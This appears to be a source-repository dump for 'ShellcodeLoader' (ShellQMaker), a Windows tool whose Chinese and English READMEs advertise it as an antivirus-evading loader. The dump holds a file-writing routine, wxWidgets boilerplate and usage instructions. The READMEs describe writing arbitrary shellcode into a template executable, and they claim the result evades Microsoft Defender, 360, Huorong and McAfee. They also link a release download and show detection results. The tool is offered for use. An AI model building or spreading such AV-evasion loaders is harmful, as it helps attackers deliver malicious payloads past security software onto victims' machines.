FILE_ATTRIBUTE_NORMAL, NULL); 75 | if (pFile == INVALID_HANDLE_VALUE) 76 | { 77 | CloseHandle(pFile); 78 | HeapFree(GetProcessHeap(), 0, file); 79 | return FALSE; 80 | } 81 | dwBytesToWrite = contentLen; 82 | dwBytesWrite = 0; 83 | tmpBuf = file; 84 | do { 85 | WriteFile(pFile, tmpBuf, dwBytesToWrite, &dwBytesWrite, NULL); 86 | dwBytesToWrite -= dwBytesWrite; 87 | tmpBuf += dwBytesWrite; 88 | 89 | } while (dwBytesToWrite > 0); 90 | 91 | CloseHandle(pFile); 92 | HeapFree(GetProcessHeap(), 0, file); 93 | return TRUE; 94 | } 95 | -------------------------------------------------------------------------------- /ShellQMaker/ShellQMaker/main.cpp: -------------------------------------------------------------------------------- 1 | // Name: minimal.cpp 2 | // Purpose: Minimal wxWidgets sample 3 | // Author: Julian Smart 4 | // Modified by: 5 | // Created: 04/01/98 6 | // Copyright: (c) Julian Smart 7 | // Licence: wxWindows licence 8 | 9 | // ============================================================================ 10 | // declarations 11 | // ============================================================================ 12 | 13 | // ---------------------------------------------------------------------------- 14 | // headers 15 | // ---------------------------------------------------------------------------- 16 | 17 | // For compilers that support precompilation, includes "wx/wx.h". 18 | #include "wx/wxprec.h" 19 | #include "main.h" 20 | 21 | #ifdef __BORLANDC__ 22 | #pragma hdrstop 23 | #endif 24 | 25 | // for all others, include the necessary headers (this file is usually all you 26 | // need because it includes almost all "standard" wxWidgets headers) 27 | #ifndef WX_PRECOMP 28 | #include "wx/wx.h" 29 | #endif 30 | 31 | // ---------------------------------------------------------------------------- 32 | // resources 33 | // ---------------------------------------------------------------------------- 34 | 35 | // the application icon (under Windows it is in resources and even 36 | // though we could still include the XPM here it would be unused) 37 | #ifndef wxHAS_IMAGES_IN_RESOURCES 38 | #include "../sample.xpm" 39 | #endif 40 | 41 | // ---------------------------------------------------------------------------- 42 | // private classes 43 | // ---------------------------------------------------------------------------- 44 | 45 | // Define a new application type, each program should derive a class from wxApp 46 | class MyApp : public wxApp { 47 | public: 48 | // override base class virtuals 49 | // ---------------------------- 50 | 51 | // this one is called on application startup and is a good place for the app 52 | // initialization (doing it here and not in the ctor allows to have an error 53 | // return: if OnInit() returns false, the application terminates) 54 | virtual bool OnInit() wxOVERRIDE; 55 | }; 56 | 57 | // Define a new frame type: this is going to be our main frame 58 | 59 | // ---------------------------------------------------------------------------- 60 | // constants 61 | // ---------------------------------------------------------------------------- 62 | 63 | // IDs for the controls and the menu commands 64 | enum { 65 | // menu items 66 | Minimal_Quit = wxID_EXIT, 67 | 68 | // it is important for the id corresponding to the "About" command to have 69 | // this standard value as otherwise it won't be handled properly under Mac 70 | // (where it is special and put into the "Apple" menu) 71 | Minimal_About = wxID_ABOUT 72 | }; 73 | 74 | // ---------------------------------------------------------------------------- 75 | // event tables and other macros for wxWidgets 76 | // ---------------------------------------------------------------------------- 77 | 78 | // the event tables connect the wxWidgets events with the functions (event 79 | // handlers) which process them. It can be also done at run-time, but for the 80 | // simple menu events like this the static method is much simpler. 81 | //wxBEGIN_EVENT_TABLE(MyFrame, wxFrame) 82 | //EVT_MENU(Minimal_Quit, MyFrame::OnQuit) 83 | //EVT_MENU(Minimal_About, MyFrame::OnAbout) 84 | //wxEND_EVENT_TABLE() 85 | 86 | // Create a new application object: this macro will allow wxWidgets to create 87 | // the application object during program execution (it's better than using a 88 | // static object for many reasons) and also implements the accessor function 89 | // wxGetApp() which will return the reference of the right type (i.e. MyApp and 90 | // not wxApp) 91 | wxIMPLEMENT_APP(MyApp); 92 | 93 | // ============================================================================ 94 | // implementation 95 | // ============================================================================ 96 | 97 | // ---------------------------------------------------------------------------- 98 | // the application class 99 | // ---------------------------------------------------------------------------- 100 | 101 | // 'Main program' equivalent: the program execution "starts" here 102 | bool MyApp::OnInit() { 103 | // call the base class initialization method, currently it only parses a 104 | // few common command-line options but it could be do more in the future 105 | if (!wxApp::OnInit()) 106 | return false; 107 | main(); 108 | // create the main application window 109 | //MyFrame* frame = new MyFrame("Minimal wxWidgets App"); 110 | 111 | // and show it (the frames, unlike simple controls, are not shown when 112 | // created initially) 113 | //frame->Show(true); 114 | 115 | // success: wxApp::OnRun() will be called which will enter the main message 116 | // loop and the application will run. If we returned false here, the 117 | // application would exit immediately. 118 | return true; 119 | } 120 | 121 | // ---------------------------------------------------------------------------- 122 | // main frame 123 | // ---------------------------------------------------------------------------- 124 | 125 | 126 | 127 | 128 | 129 | 130 | -------------------------------------------------------------------------------- /ShellQMaker/ShellQMaker/main.h: -------------------------------------------------------------------------------- 1 | #pragma once 2 | int main(); -------------------------------------------------------------------------------- /readme.md: -------------------------------------------------------------------------------- 1 | # ShellcodeLoader 2 | Windows通用免杀shellcode加载器 3 | 4 | language: [English](readme_en.md) 5 | 6 | Windows平台的ShellcodeLoader能够免杀Microsoft Defender、360、火绒、迈克菲、Panda. 7 | 8 | ## 功能特点 9 | 10 | 环境:加载器模板通过QT实现使用C++开发,并由VS2022静态编译。 11 | 12 | 目前只有一种加载模式,其他加载模式正在开发中。 13 | 14 | 截至发布时间,该项目免杀国内外主流杀毒软件; 15 | 16 | 方法:使用vs2022打开项目解决方案(.sln),然后进行编译即可。当然,你也可以从[realse](https://github.com/SecurityAnalysts01/ShellcodeLoader/releases/download/v1.1/ShellQMaker1.2.zip)下载项目。 17 | 18 | ## Project Files 19 | 20 | 本工具由ShellQMaker.exe和加载模板文件(loading.exe)组成。ShellQMaker.exe将不同的shellcode写入加载的模板文件(loading.exe)中,生成不同的可执行文件。 21 | 22 | image-20221124160121278 23 | 24 | ## 使用方法 25 | 26 | **执行ShellQMaker查看帮助** 27 | 28 | ![image-20221130105542851](Readme/shellQMaker-Instructions-001.png) 29 | 30 | **获取payload.bin文件** 31 | 32 | ![image-20221130105542851](Readme/shellQMaker-Instructions-002.png) 33 | 34 | **ShellQMaker (你的shellcode) (生成的可执行文件)** 35 | 36 | ![image-20221130105542851](Readme/shellQMaker-Instructions-003.png) 37 | 38 | **最终生成的可执行免杀程序** 39 | 40 | ![image-20221130105542851](Readme/shellQMaker-Instructions-004.png) 41 | 42 | ## Result 43 | 360 44 | 45 | ![image-20221130105542851](Readme/Result-01.png) 46 | 47 | 火绒 48 | 49 | ![image-20221130105542851](Readme/Result-02.png) 50 | 51 | Microsoft Defender 52 | 53 | ![image-20221130105542851](Readme/Result-03.png) 54 | 55 | 迈克菲 56 | 57 | ![image-20221130105542851](Readme/Result-04.png) 58 | -------------------------------------------------------------------------------- /readme_en.md: -------------------------------------------------------------------------------- 1 | # ShellcodeLoader 2 | Universal shellcode generator of Windows can bypass AV . 3 | 4 | 语言: [中文](readme.md) 5 | 6 | ShellcodeLoader of windows can bypass Microsoft Defender、360、HuoRong、McAfee、Panda. 7 | 8 | 9 | ## Features 10 | 11 | Environment: The loader template is developed using C++ through QT and statically compiled by VS2022. 12 | 13 | Currently it only has one loading modes,Other loading modes are in development. 14 | 15 | As of the release date, the project is exempt from killing mainstream antivirus software at home and abroad; 16 | 17 | Methods: Use vs2022 to open the project solution (. sln), and then compile.Of course,You can download the product from [realse](https://github.com/SecurityAnalysts01/ShellcodeLoader/releases/download/v1.1/ShellQMaker1.2.zip) . 18 | 19 | ## Project Files 20 | 21 | The tool is composed of ShellQMaker.exe and Load template file(loading.exe).ShellQMaker.exe writes different shellcodes into the loaded template file(loading.exe) to generate different executable files. 22 | 23 | image-20221124160121278 24 | 25 | ## Instructions 26 | 27 | **execute ShellQMaker to view the help** 28 | 29 | ![image-20221130105542851](Readme/shellQMaker-Instructions-001.png) 30 | 31 | **get download.dat** 32 | 33 | ![image-20221130105542851](Readme/shellQMaker-Instructions-002.png) 34 | 35 | **ShellQMaker (your shellcode) (executable files)** 36 | 37 | ![image-20221130105542851](Readme/shellQMaker-Instructions-003.png) 38 | 39 | **The final executable evasion program will be generated.** 40 | 41 | ![image-20221130105542851](Readme/shellQMaker-Instructions-004.png) 42 | 43 | ## Result 44 | 45 | 360 46 | 47 | ![image-20221130105542851](Readme/Result-01.png) 48 | 49 | HUORONG 50 | 51 | ![image-20221130105542851](Readme/Result-02.png) 52 | 53 | Microsoft Defender 54 | 55 | ![image-20221130105542851](Readme/Result-03.png) 56 | 57 | McAfee 58 | 59 | ![image-20221130105542851](Readme/Result-04.png) 60 | 61 | --------------------------------------------------------------------------------